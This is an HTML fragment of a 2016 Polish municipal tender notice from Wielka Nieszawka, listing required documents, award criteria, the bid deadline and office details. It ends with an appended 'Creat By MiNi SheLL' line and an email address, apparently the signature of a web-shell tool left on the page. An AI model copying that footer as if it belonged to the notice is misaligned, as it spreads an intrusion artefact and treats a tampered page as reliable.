<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Wstępna koncepcja architektoniczna wraz z koncepcją rozwiązań funkcjonalnych - 35</li>
<li>3 - Wysokość kar umownych - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.wielkanieszawka.lo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Wielkiej Nieszawce, ul.Toruńska 12, 87-165 Cierpice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.06.2016 godzina 10:00, miejsce: Urząd Gminy w Wielkiej Nieszawce, ul.Toruńska 12, 87-165 Cierpice, pokój nr 2 - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com